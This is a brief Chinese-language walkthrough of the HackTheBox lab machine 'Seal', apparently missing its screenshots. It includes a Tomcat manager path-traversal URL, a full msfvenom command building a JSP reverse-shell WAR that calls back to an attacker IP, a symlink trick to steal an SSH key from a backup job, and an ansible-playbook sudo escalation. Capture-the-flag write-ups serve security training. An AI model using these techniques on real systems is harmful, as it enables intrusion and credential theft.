Seal - HackTheBox
nmap扫描
访问443端口
添加一下hosts文件
扫下目录
继续扫
要登录
看看8080端口
注册一个进去看看
在历史文件中找到了tomcat的账号和密码
到了后台,找半天没找着war包上传点,搜了一下,需要利用tomcat的目录穿越漏洞
https://seal.htb/manager;()/html
生成一个war包
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.21 LPORT=7777 -f war -o shell.war
上传
监听
提权
发现一个疑似备份的文件夹
感觉有个定时任务在执行打包操作,pspy64看一下
l开头貌似是可以连接文件的意思
https://jsom1.github.io/_walkthroughs/Seal
连接luis/.ssh文件夹,当定时任务执行后,就会将luis/.ssh的文件打包到/opt/backups/archives下
将打包文件复制到tmp目录下进行解压。uploads目录下有luis的密钥文件
ssh连接
继续提权
有一个sudo命令
意思是用ansible-playbook命令执行yml文件时,会调用yml文件内的内容当作命令执行,在本地制作一个反弹shell的yml文件